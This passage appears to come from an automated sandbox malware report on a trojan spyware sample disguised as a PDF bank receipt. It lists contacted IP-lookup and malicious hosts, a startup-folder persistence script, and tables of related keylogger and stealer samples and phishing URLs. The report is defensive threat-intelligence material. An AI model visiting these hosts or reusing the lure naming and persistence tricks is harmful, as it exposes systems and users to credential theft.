https://stackoverflow.com/q/14436606/23354	dekont_001.pdf.exe, 00000000.00000002.1761092855.0000000002EE6000.00000004.00000800.00020000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1772053391.0000000006B60000.00000004.08000000.00040000.00000000.sdmp, Id.exe, 00000004.00000002.1927771292.0000000002F8C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/mgravell/protobuf-netJ	dekont_001.pdf.exe, 00000000.00000002.1772053391.0000000006B60000.00000004.08000000.00040000.00000000.sdmp	false		unknown
https://reallyfreegeoip.org/xml/173.254.250.81$	InstallUtil.exe, 00000001.00000002.2934160902.0000000002E7A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002E87000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002E5A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002E0E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.00000000032D5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.0000000003269000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.0000000003310000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.000000000331F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.00000000032E3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.00000000032C7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.00000000032B9000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://stackoverflow.com/q/11564914/23354;	dekont_001.pdf.exe, 00000000.00000002.1772053391.0000000006B60000.00000004.08000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://stackoverflow.com/q/2152978/23354	dekont_001.pdf.exe, 00000000.00000002.1772053391.0000000006B60000.00000004.08000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org/q	dekont_001.pdf.exe, 00000000.00000002.1768060486.0000000003E48000.00000004.00000800.00020000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1761092855.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1768060486.0000000003EC8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2930601192.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Id.exe, 00000004.00000002.1927771292.000000000339C000.00000004.00000800.00020000.00000000.sdmp, Id.exe, 00000004.00000002.1946252341.0000000003FC8000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://reallyfreegeoip.org	InstallUtil.exe, 00000001.00000002.2934160902.0000000002E7A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002E87000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002DE3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002E5A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.00000000032D5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.0000000003310000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.000000000331F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.000000000323E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.00000000032E3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.00000000032C7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.00000000032B9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/mgravell/protobuf-net	dekont_001.pdf.exe, 00000000.00000002.1772053391.0000000006B60000.00000004.08000000.00040000.00000000.sdmp	false		unknown
https://reallyfreegeoip.org	InstallUtil.exe, 00000001.00000002.2934160902.0000000002E7A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002E87000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002E5A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002E0E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.00000000032D5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.0000000003226000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.0000000003269000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.0000000003310000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.000000000331F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.00000000032E3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.00000000032C7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.00000000032B9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org	InstallUtil.exe, 00000001.00000002.2934160902.0000000002E95000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002E7A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002E87000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002E5A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002E0E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.00000000032D5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.0000000003217000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.0000000003226000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.0000000003269000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.0000000003310000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.000000000331F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.00000000032E3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.00000000032C7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.00000000032B9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.com	InstallUtil.exe, 00000001.00000002.2934160902.0000000002E7A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002E87000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002E5A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.00000000032D5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.0000000003226000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.0000000003310000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.000000000331F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.00000000032E3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.00000000032C7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.00000000032B9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	dekont_001.pdf.exe, 00000000.00000002.1761092855.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, Id.exe, 00000004.00000002.1927771292.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.0000000003161000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/	dekont_001.pdf.exe, 00000000.00000002.1768060486.0000000003E48000.00000004.00000800.00020000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1761092855.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1768060486.0000000003EC8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2930601192.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Id.exe, 00000004.00000002.1927771292.000000000339C000.00000004.00000800.00020000.00000000.sdmp, Id.exe, 00000004.00000002.1946252341.0000000003FC8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.0000000003226000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
188.132.193.46	erkasera.com	Turkey	42910	PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTR	false
188.114.97.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	true
158.101.44.242	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1542398
Start date and time:	2024-10-25 21:26:05 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 5s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	dekont_001.pdf.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@8/3@3/3
EGA Information:	Successful, ratio: 25%
HCA Information:	Successful, ratio: 93% Number of executed functions: 370 Number of non-executed functions: 54
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Id.exe, PID 2188 because it is empty
Execution Graph export aborted for target InstallUtil.exe, PID 4192 because it is empty
Execution Graph export aborted for target dekont_001.pdf.exe, PID 6968 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: dekont_001.pdf.exe

Simulations

Behavior and APIs

Time	Type	Description
15:26:56	API Interceptor	56x Sleep call for process: dekont_001.pdf.exe modified
15:27:07	API Interceptor	2776435x Sleep call for process: InstallUtil.exe modified
15:27:16	API Interceptor	33x Sleep call for process: Id.exe modified
20:27:07	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Id.vbs

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.132.193.46	PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Get hash	malicious	DarkCloud	Browse
	Contact Form and Delivery Details.png.lnk	Get hash	malicious	Unknown	Browse
	Maersk Shipping Document.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	Maersk Shipping Document.com.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
188.114.97.3	PO 4800040256.exe	Get hash	malicious	FormBook	Browse	www.cc101.pro/4hfb/
	QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/cDXpxO66/download
	Instruction_1928.pdf.lnk.download.lnk	Get hash	malicious	LummaC	Browse	tech-tribune.shop/pLQvfD4d5/index.php
	WBCDZ4Z3M2667YBDZ5K4.bin.exe	Get hash	malicious	Unknown	Browse	tech-tribune.shop/pLQvfD4d5/index.php
	yGktPvplJn.exe	Get hash	malicious	Pushdo	Browse	www.rs-ag.com/
	https://is.gd/6NgVrQ	Get hash	malicious	HTMLPhisher	Browse	aa.opencompanies.co.uk/vEXJm/
	Comprobante de pago.xlam.xlsx	Get hash	malicious	Unknown	Browse	paste.ee/d/KXy1F
	01YP9Lwum8.exe	Get hash	malicious	DCRat	Browse	77777cm.nyashtyan.in/externalpipejsprocessAuthapiDbtrackWordpressCdn.php
	PO-000041522.exe	Get hash	malicious	FormBook	Browse	www.freedietbuilder.online/nnla/
	http://onlinecheapflights.net/	Get hash	malicious	Unknown	Browse	onlinecheapflights.net/
158.101.44.242	New_Order_568330_Material_Specifications.exe	Get hash	malicious	AgentTesla, MassLogger RAT, Phoenix Stealer, RedLine, SugarDump, XWorm	Browse	checkip.dyndns.org/
	g1TLK7mbZD.img	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Renommxterne.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	InvoiceXCopy.xls	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	CLOSURE.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	file.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	7vbu8ZW8lFI8mn5.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	REVISED PROFORMA INVOICE STVC007934196.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	MT103-539 PAYMENT (1).docx.doc	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	PaymentXConfirmationXcopy.xls	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	Bank transfer receipt 241015.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	Certificado FNMT-RCM.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	Justificante.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	n#U00ba 7064-2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	Factura 1-014685.pdf.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	SOLICITUD URGENTE RFQ-05567.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	PILNE ZAPYTANIE RFQ-05567-2024.10.25.vbs	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Factura n#U00baB-2542.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	New_Order_568330_Material_Specifications.exe	Get hash	malicious	AgentTesla, MassLogger RAT, Phoenix Stealer, RedLine, SugarDump, XWorm	Browse	188.114.97.3
checkip.dyndns.com	Bank transfer receipt 241015.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	Certificado FNMT-RCM.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.8.169
	Justificante.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	n#U00ba 7064-2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	Factura 1-014685.pdf.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
	SOLICITUD URGENTE RFQ-05567.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	PILNE ZAPYTANIE RFQ-05567-2024.10.25.vbs	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	Factura n#U00baB-2542.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.8.169
	QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	New_Order_568330_Material_Specifications.exe	Get hash	malicious	AgentTesla, MassLogger RAT, Phoenix Stealer, RedLine, SugarDump, XWorm	Browse	158.101.44.242
erkasera.com	PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Get hash	malicious	DarkCloud	Browse	188.132.193.46

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://docs.google.com/drawings/d/1gvM7ysnJ7zDcSUShXnPoiA6pG4cjDDn9uHRbivsGidA/preview?pli=1jjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZs	Get hash	malicious	Mamba2FA	Browse	104.17.25.14
	(No subject) (92).eml	Get hash	malicious	Unknown	Browse	104.18.65.57
	Setup.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	RobCheat.exe	Get hash	malicious	Python Stealer, CStealer	Browse	172.67.75.40
	botnet.arm5.elf	Get hash	malicious	Mirai, Moobot	Browse	104.30.170.32
	http://ERICADLERCLOTHING.com	Get hash	malicious	Unknown	Browse	188.114.96.3
	kingdom.ps1	Get hash	malicious	Atlantida Stealer	Browse	172.67.74.163
	Purchase order.xls	Get hash	malicious	Lokibot	Browse	188.114.97.3
	__5A1AACAD-4F60-4DC8-94AA-4866010B7794_.bat	Get hash	malicious	Unknown	Browse	104.16.230.132
	Payment Advice.xls	Get hash	malicious	Lokibot	Browse	188.114.96.3
PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTR	PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Get hash	malicious	DarkCloud	Browse	188.132.193.46
	DRUMMONDLTD _ 21ST_OCTOBER_2024 _.PDF	Get hash	malicious	Unknown	Browse	78.135.79.21
	https://t.ly/k1aDE	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	78.135.79.21
	voicemai____Now_AUD__autoresponse(9.htm	Get hash	malicious	Phisher	Browse	188.132.193.30
	Swift E-Posta Bildirimi_2024-09-23_T11511900.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.132.158.64
	Contact Form and Delivery Details.png.lnk	Get hash	malicious	Unknown	Browse	188.132.193.46
	e-dekont.html.exe	Get hash	malicious	AgentTesla	Browse	188.132.200.16
	ZgBCG135hk.elf	Get hash	malicious	Mirai, Moobot	Browse	77.92.131.244
	Dekont_20240917_38847738373.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	78.135.65.5
	jMMTZcFBa8.elf	Get hash	malicious	Mirai, Okiru	Browse	188.132.182.118
ORACLE-BMC-31898US	(No subject) (92).eml	Get hash	malicious	Unknown	Browse	192.29.14.118
	Factura 1-014685.pdf.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
	QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	la.bot.powerpc.elf	Get hash	malicious	Unknown	Browse	134.70.38.61
	la.bot.m68k.elf	Get hash	malicious	Unknown	Browse	129.147.169.37
	yGktPvplJn.exe	Get hash	malicious	Pushdo	Browse	147.154.3.56
	la.bot.arm7.elf	Get hash	malicious	Unknown	Browse	130.61.69.123
	New_Order_568330_Material_Specifications.exe	Get hash	malicious	AgentTesla, MassLogger RAT, Phoenix Stealer, RedLine, SugarDump, XWorm	Browse	158.101.44.242
	Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	la.bot.m68k.elf	Get hash	malicious	Unknown	Browse	140.238.246.224

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	https://docs.google.com/drawings/d/1agK-6fGF4y65hrPDNlHipoTNyumPU-yxdwKLkQWhsQI/preview?pli=1oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Q